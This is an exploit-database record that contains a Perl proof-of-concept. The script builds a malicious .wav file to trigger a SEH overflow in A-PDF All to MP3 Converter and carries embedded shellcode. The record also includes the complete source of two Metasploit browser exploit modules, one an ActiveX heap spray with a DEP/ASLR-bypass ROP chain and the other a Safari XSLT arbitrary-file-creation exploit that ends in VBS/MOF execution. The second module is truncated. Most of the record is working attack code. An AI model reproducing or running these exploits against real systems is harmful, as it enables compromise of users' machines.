ID 1337DAY-ID-15167
Type zdt
Reporter m0nna
Modified 2011-01-30T00:00:00
Description
Exploit for windows platform in category local exploits
# Exploit Title: A-PDF All to MP3 Converter v.2.0.0 SEH overflow
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: <= 2.0.0
# Tested on: Win XP SP2 English
# Date: 29/01/2011
# Author: m0nna
#Email: [email protected]
# triggering details: Open the app, drag the crafted .wav file, calc pops out
# Credits to : h1ch4m (for the stack based overflow exploit)
# Builds the proof-of-concept input file and writes it out in one shot.
# Byte layout of the output, in order: 4132 filler bytes, a 4-byte nSEH
# field, a 4-byte SEH handler field, then the 343-byte payload declared
# below -- 4483 bytes in total.  Nothing else is written: the file carries
# no RIFF/WAVE header, so it is a .wav by extension only.  A ".wav" whose
# first 4132 bytes are all 0x41 is therefore a cheap thing to look for.
my $file = "exploit_seh.wav";
# 4132 bytes of 0x41 ('A').  Presumably the offset at which the author's
# SEH record sat on the tested build (Win XP SP2 English, see header);
# the two 4-byte fields below land immediately after it.
my $junk ="\x41" x 4132 ;
# 4-byte value written into the next-SEH (nSEH) slot.
my $nseh = "\xeb\x06\x90\x90";
# 4-byte value written into the SEH handler slot: 0x005d6a91 packed as a
# 32-bit little-endian integer ("V"), i.e. bytes 91 6a 5d 00.
my $seh = pack("V", 0x005d6a91);
# windows/exec - 343 bytes
# http://www.metasploit.com
# Encoder: PexAlphaNum
# EXITFUNC=seh, CMD=calc
# The 22 string fragments below concatenate to exactly 343 bytes
# (21 x 16 + 7), matching the count in the comment above.
my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37".
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48".
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43".
"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b".
"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37".
"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49".
"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46".
"\x4e\x36\x43\x46\x42\x50\x5a";
# NOTE(review): the I/O below is left as the author wrote it; things a
# maintainer would normally fix:
#  - open() uses a bareword handle and its result is never checked, so a
#    failure to create the file is silent (no `or die "open $file: $!"`);
#    "$file" is also needlessly quoted -- the bare scalar would do.
#  - the handle is never binmode()d or close()d; output is only flushed
#    when the interpreter exits.  It happens to work because none of the
#    bytes assembled above is 0x0a, so text-mode newline translation on
#    Windows has nothing to alter -- fragile rather than wrong.
#  - the script has no `use strict; use warnings;`.
open OUTPUT, ">", "$file";
print OUTPUT $junk.$nseh.$seh.$shellcode;
# 0day.today [2018-04-08] #
{"published": "2011-01-30T00:00:00", "id": "1337DAY-ID-15167", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T23:48:16", "bulletin": {"published": "2011-01-30T00:00:00", "id": "1337DAY-ID-15167", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.3, "modified": "2016-04-19T23:48:16", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/"}}, "hash": "1ccda0695882b07dc872421cac6249f482d65d5dda2bda72c0917703fcec4d6e", "description": "Exploit for windows platform in category local exploits", "type": "zdt", "lastseen": "2016-04-19T23:48:16", "edition": 1, "title": "A-PDF All to MP3 Converter 2.0.0 (.wav) Buffer Overflow (seh)", "href": "http://0day.today/exploit/description/15167", "modified": "2011-01-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/15167", "references": [], "reporter": "m0nna", "sourceData": "# Exploit Title: A-PDF All to MP3 Converter v.2.0.0 SEH overflow\r\n# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm\r\n# Version: <= 2.0.0\r\n# Tested on: Win XP SP2 English\r\n# Date: 29/01/2011\r\n# Author: m0nna\r\n#Email: malware.monna@gmail.com\r\n# triggering details: Open the app, drag the crafted .wav file, calc pops out\r\n# Credits to : h1ch4m (for the stack based overflow exploit)\r\n \r\n \r\nmy $file = \"exploit_seh.wav\";\r\nmy $junk =\"\\x41\" x 4132 ;\r\nmy $nseh = \"\\xeb\\x06\\x90\\x90\";\r\nmy $seh = pack(\"V\", 0x005d6a91);\r\n \r\n# windows/exec - 343 bytes\r\n# http://www.metasploit.com\r\n# Encoder: PexAlphaNum\r\n# EXITFUNC=seh, CMD=calc\r\n \r\nmy $shellcode = 
\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\".\r\n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x54\\x4e\\x33\\x4b\\x58\\x4e\\x37\".\r\n\"\\x45\\x50\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x41\\x4b\\x48\".\r\n\"\\x4f\\x35\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x34\\x4b\\x38\\x46\\x43\\x4b\\x48\".\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x48\\x42\\x4c\".\r\n\"\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x42\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\".\r\n\"\\x4f\\x35\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x58\\x4e\\x30\\x4b\\x54\".\r\n\"\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x31\\x4b\\x48\".\r\n\"\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x43\".\r\n\"\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x54\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x57\".\r\n\"\\x4e\\x30\\x4b\\x48\\x42\\x54\\x4e\\x30\\x4b\\x48\\x42\\x37\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x58\\x4a\\x56\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x38\\x42\\x38\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x58\\x4a\\x46\\x4e\\x43\\x4f\\x35\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x37\".\r\n\"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x50\\x4f\\x45\\x4a\\x46\\x4a\\x49\".\r\n\"\\x50\\x4f\\x4c\\x58\\x50\\x30\\x47\\x45\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x41\\x46\".\r\n\"\\x4e\\x36\\x43\\x46\\x42\\x50\\x5a\";\r\n \r\nopen OUTPUT, \">\", \"$file\";\r\n \r\nprint OUTPUT 
$junk.$nseh.$seh.$shellcode;\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "4a48e12ded3dc8ee46d6955a64097e91", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1a69dabaca705ac779700625bdcbf78b", "key": "sourceHref"}, {"hash": "c627e0e0fc8d09db8375530071bd4405", "key": "published"}, {"hash": "6a327d8fd14faa15a3d2dcc7639d6be1", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c627e0e0fc8d09db8375530071bd4405", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "92058cfdb472b89dbc6ce2bafc51604b", "key": "reporter"}, {"hash": "3214f286a3dcfb2dfa86929a07c846ca", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for windows platform in category local exploits", "hash": "e408cada7c05dd5878dafb4c6c4601a83cedde9d18362ca31b2a548a6fdb2364", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-04-08T03:47:24"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-4132"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:15167", "SECURITYVULNS:DOC:8525"]}], "modified": "2018-04-08T03:47:24"}, "vulnersScore": -0.1}, "type": "zdt", "lastseen": "2018-04-08T03:47:24", "edition": 2, "title": "A-PDF All to MP3 Converter 2.0.0 (.wav) Buffer Overflow (seh)", "href": "https://0day.today/exploit/description/15167", "modified": "2011-01-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/15167", "references": [], "reporter": "m0nna", "sourceData": "# Exploit Title: A-PDF All to MP3 Converter v.2.0.0 SEH overflow\r\n# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm\r\n# Version: <= 2.0.0\r\n# Tested on: Win 
XP SP2 English\r\n# Date: 29/01/2011\r\n# Author: m0nna\r\n#Email: [email\u00a0protected]\r\n# triggering details: Open the app, drag the crafted .wav file, calc pops out\r\n# Credits to : h1ch4m (for the stack based overflow exploit)\r\n \r\n \r\nmy $file = \"exploit_seh.wav\";\r\nmy $junk =\"\\x41\" x 4132 ;\r\nmy $nseh = \"\\xeb\\x06\\x90\\x90\";\r\nmy $seh = pack(\"V\", 0x005d6a91);\r\n \r\n# windows/exec - 343 bytes\r\n# http://www.metasploit.com\r\n# Encoder: PexAlphaNum\r\n# EXITFUNC=seh, CMD=calc\r\n \r\nmy $shellcode = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\".\r\n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x54\\x4e\\x33\\x4b\\x58\\x4e\\x37\".\r\n\"\\x45\\x50\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x41\\x4b\\x48\".\r\n\"\\x4f\\x35\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x34\\x4b\\x38\\x46\\x43\\x4b\\x48\".\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x48\\x42\\x4c\".\r\n\"\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x42\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\".\r\n\"\\x4f\\x35\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x58\\x4e\\x30\\x4b\\x54\".\r\n\"\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x31\\x4b\\x48\".\r\n\"\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x43\".\r\n\"\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x54\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x57\".\r\n\"\\x4e\\x30\\x4b\\x48\\x42\\x54\\x4e\\x30\\x4b\\x48\\x42\\x37\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x58\\x4a\\x56\\x4a\\x50\\x4b\\x4e
\\x49\\x30\\x4b\\x38\\x42\\x38\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x58\\x4a\\x46\\x4e\\x43\\x4f\\x35\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x37\".\r\n\"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x50\\x4f\\x45\\x4a\\x46\\x4a\\x49\".\r\n\"\\x50\\x4f\\x4c\\x58\\x50\\x30\\x47\\x45\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x41\\x46\".\r\n\"\\x4e\\x36\\x43\\x46\\x42\\x50\\x5a\";\r\n \r\nopen OUTPUT, \">\", \"$file\";\r\n \r\nprint OUTPUT $junk.$nseh.$seh.$shellcode;\r\n\r\n\n\n# 0day.today [2018-04-08] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "1d715c1431229c773c29a2a26da202b9", "key": "href"}, {"hash": "c627e0e0fc8d09db8375530071bd4405", "key": "modified"}, {"hash": "c627e0e0fc8d09db8375530071bd4405", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "92058cfdb472b89dbc6ce2bafc51604b", "key": "reporter"}, {"hash": "ad80be0cd8f197e031a1878dcfd68894", "key": "sourceData"}, {"hash": "78682a8c57e6cde5420b4d6177917cda", "key": "sourceHref"}, {"hash": "3214f286a3dcfb2dfa86929a07c846ca", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-12-09T05:35:53", "bulletinFamily": "exploit", "description": "This module exploits an uninitialized variable vulnerability in the Annotation Objects ActiveX component. The ActiveX component loads into memory without opting into ALSR so this module exploits the vulnerability against windows Vista and Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX points to part of the ROP chain in a heap chunk and the calculated call will hit the pivot in a separate heap chunk. This will take some time in the users browser.\n", "modified": "2017-10-05T21:44:36", "published": "2012-04-12T06:30:01", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/INTRUST_ANNOTATEX_ADD", "href": "", "type": "metasploit", "title": "Quest InTrust Annotation Objects Uninitialized Pointer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super( update_info(info,\n 'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer',\n 'Description' => %q{\n This module exploits an uninitialized variable vulnerability in the\n Annotation Objects ActiveX component. The ActiveX component loads into memory without\n opting into ALSR so this module exploits the vulnerability against windows Vista and\n Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX\n points to part of the ROP chain in a heap chunk and the calculated call will hit the\n pivot in a separate heap chunk. 
This will take some time in the users browser.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rgod <rgod[at]autistici.org>', # initial discovery & poc\n 'mr_me <steventhomasseeley[at]gmail.com>' # msf module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-5896'],\n [ 'OSVDB', '80662'],\n [ 'BID', '52765'],\n [ 'EDB', '18674']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4]\n # calculation: <targetaddress> - 0x44024a50 / 4 = Ret\n [ 'Automatic', {} ],\n\n # Windows XP/Vista/IE6/IE7 target\n [\n 'Windows XP/Vista SP0-SP3 (IE6/IE7)',\n {\n 'Ret' => 0x76767676,\n }\n ],\n\n # Windows XP/IE8 target - ASLR/DEP Bypass\n [\n 'Windows XP SP0-SP3 DEP bypass (IE8)',\n {\n 'Ret' => 0x31AAAD78,\n }\n ],\n\n # Windows 7/Vista/IE8 target - ASLR/DEP Bypass\n [\n 'Windows 7/Vista ALSR/DEP bypass (IE8)',\n {\n 'Ret' => 0x31AAAD78,\n }\n ]\n ],\n 'DisclosureDate' => 'Mar 28 2012',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true])\n ])\n end\n\n def junk\n return rand_text_alpha(4).unpack(\"L\")[0].to_i\n end\n\n def nops(s)\n nops = make_nops(4).unpack(\"N*\") * s\n return nops\n end\n\n def on_request_uri(cli, request)\n #Set target manually or automatically\n my_target = target\n if my_target.name == 'Automatic'\n agent = request.headers['User-Agent']\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6\\.0/\t# xp/ie6\n my_target = targets[1]\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7\\.0/\t# xp/ie7\n my_target = targets[1]\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7\\.0/\t# vista/ie7\n my_target = targets[1]\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\t# xp/ie8\n my_target = targets[2]\n elsif agent =~ /NT 6\\.0/ and agent =~ 
/MSIE 8\\.0/\t# vista/ie8\n my_target = targets[2]\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/\t# win7/ie8\n my_target = targets[3]\n end\n end\n\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # shellcode\n sc = Rex::Text.to_unescape(p.encoded)\n\n # Randomize object name\n obj_name = rand_text_alpha(rand(100) + 1)\n main_sym = 'main' #main function name\n\n randnop = rand_text_alpha(rand(100) + 1)\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4)\n\n if my_target.name =~ /IE6/ or my_target.name =~ /IE7/\n\n js = <<-EOS\n function heapspray(){\n shellcode = unescape('#{sc}');\n #{randnop} = \"#{js_nops};\n bigblock = unescape(#{randnop});\n headersize = 20;\n slackspace = headersize+shellcode.length;\n while (bigblock.length<slackspace){ bigblock+=bigblock; }\n fillblock = bigblock.substring(0, slackspace);\n block = bigblock.substring(0, bigblock.length-slackspace);\n while(block.length+slackspace<0x40000){ block = block+block+fillblock; }\n memory = new Array();\n for (i=0;i<1000;i++){ memory[i] = block+shellcode; }\n }\n\n function main(){\n heapspray();\n \t\t\t\t#{obj_name}.Add(#{my_target.ret},1);\n }\n EOS\n\n end\n\n if my_target.name =~ /IE8/\n\n # all rop gadgets are taken from AnnotateX.dll - v1.0.32.0 (non alsr/non rebase)\n rop_gadgets = [\n junk,\n junk,\n junk,\n 0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)\n ].pack('V*')\n\n rop_gadgets << [0x44015CEF].pack('V*') * 140\t# padding of retn's\n\n rop_gadgets << [\n 0x44015CEF, # retn\n 0x44015CEF, # retn\n 0x44015CEF, # retn\n 0x44015cee, # pop edx ; retn\n 0x4401a130, # ptr to &VirtualAlloc() (IAT)\n 0x44015ca4, # mov eax,[edx+4] ; retn\n 0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14\n junk, # filler (compensate)\n 0x440159bb, # pop ebp ; retn\n junk, # filler (retn offset compensation)\n junk, # filler (retn offset compensation)\n junk, # filler (retn offset compensation)\n junk, # filler (retn offset compensation)\n 
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)\n 0x440012c1, # push esp ; ret 08\n 0x44016264, # pop ebx ; retn\n 0x00004000, # 0x00000001-> ebx\n 0x44015cc9, # pop edx ; retn\n 0x00001000, # 0x00001000-> edx\n 0x44017664, # pop ecx ; retn\n 0x00000040, # 0x00000040-> ecx\n 0x44017bd8, # pop edi ; retn\n 0x44017ebe, # retn\n 0x4400bf25, # pop eax ; retn\n 0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn\n 0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]\n 0x90909090, # nops, do not change as it changes the offset\n nops(11)\n ].flatten.pack('V*')\n\n rop = Rex::Text.to_unescape(rop_gadgets)\n\n js = <<-EOF\n function heapspray(){\n var payload = unescape('#{rop}');\n payload += unescape('#{sc}');\n var data = payload;\n while(data.length < 100000) { data += data; }\n var onemeg = data.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += data.substr(0, 64*1024/2);\n }\n\n onemeg += data.substr(0, (64*1024/2)-(38/2));\n var block = new Array();\n\n for (i=0; i<700; i++) {\n block[i] = onemeg.substr(0, onemeg.length);\n \t\t\t}\n }\n\n function main(){\n heapspray();\n #{obj_name}.Add(#{my_target.ret},1);\n }\n EOF\n\n #JS obfuscation on demand only for IE8\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n main_sym = js.sym('main')\n end\n\n end\n\n content = <<-EOF\n <object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='#{obj_name}' ></object>\n <script language='JavaScript' defer>\n #{js}\n </script>\n <body onload=\"#{main_sym}();\">\n <body>\n </html>\n EOF\n\n print_status(\"Sending #{self.name}\")\n\n #Remove the extra tabs from content\n content = content.gsub(/^ {4}/, '')\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n=begin\neax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001\neip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei 
pl nz na po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\nANNOTA_1+0xae62:\n4400ae62 ff1485504a0244 call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=????????\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/intrust_annotatex_add.rb"}, {"lastseen": "2019-11-05T17:45:56", "bulletinFamily": "exploit", "description": "This module exploits a file creation vulnerability in the Webkit rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module has been tested on Safari and Maxthon. Code execution can be achieved by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS.\n", "modified": "2017-09-14T02:03:34", "published": "2011-10-18T07:39:50", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/SAFARI_XSLT_OUTPUT", "href": "", "type": "metasploit", "title": "Apple Safari Webkit libxslt Arbitrary File Creation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation',\n 'Description' => %q{\n This module exploits a file creation vulnerability in the Webkit\n rendering engine. It is possible to redirect the output of a XSLT\n transformation to an arbitrary file. The content of the created file must be\n ASCII or UTF-8. 
The destination path can be relative or absolute. This module\n has been tested on Safari and Maxthon. Code execution can be achieved by first\n uploading the payload to the remote machine in VBS format, and then upload a MOF\n file, which enables Windows Management Instrumentation service to execute the VBS.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Nicolas Gregoire'],\n 'References' =>\n [\n ['CVE', '2011-1774'],\n ['OSVDB', '74017'],\n ['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'],\n ],\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Payload' =>\n {\n 'Space' => 2048,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n #Windows before Vista\n [ 'Automatic', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jul 20 2011'))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Check target before attacking\n agent = request.headers['User-Agent']\n if agent !~ /Windows NT 5\\.1/ or agent !~ /Safari\\/5/ or agent =~ /Chrome/\n print_error(\"This target isn't supported: #{agent.to_s}\")\n send_not_found(cli)\n return\n end\n\n url = \"http://\"\n url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n url += \":\" + datastore['SRVPORT'].to_s + get_resource() + \"/\"\n\n content = <<-EOS\n<?xml-stylesheet type=\"text/xml\" href=\"#fragment\"?>\n<!-- Define the DTD of the document\n This is needed, in order to later reference the XSLT stylesheet by a #fragment\n This trick allows to have both the XML and the XSL in the same file\n Cf. 
http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html -->\n<!DOCTYPE doc [\n <!ATTLIST xsl:stylesheet\n id ID #REQUIRED\n>]>\n<doc>\n\n<!-- Define location and content of the files -->\n<mof>\n <location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\wbem\\\\mof\\\\#{@mof_name}]]></location>\n <content><![CDATA[#{@mof_content}]]></content>\n</mof><vbs>\n <location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\#{@vbs_name}]]></location>\n <content><![CDATA[#{@vbs_content}]]></content>\n</vbs>\n\n<!-- The XSLT stylesheet header, including the \"sx\" extension -->\n<xsl:stylesheet id=\"fragment\" version=\"1.0\"\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\n xmlns:sx=\"http://icl.com/saxon\"\n extension-element-prefixes=\"sx\"\n xmlns=\"http://www.w3.org/1999/xhtml\" >\n<xsl:output method=\"xml\" indent=\"yes\" />\n\n<!-- The XSLT template -->\n<xsl:template match=\"/\">\n <!-- Define some XSLT variables -->\n <xsl:variable name=\"moflocation\" select=\"//mof/location/text()\"/>\n <xsl:variable name=\"vbslocation\" select=\"//vbs/location/text()\"/>\n <!-- Create the files -->\n <sx:output file=\"{$vbslocation}\" 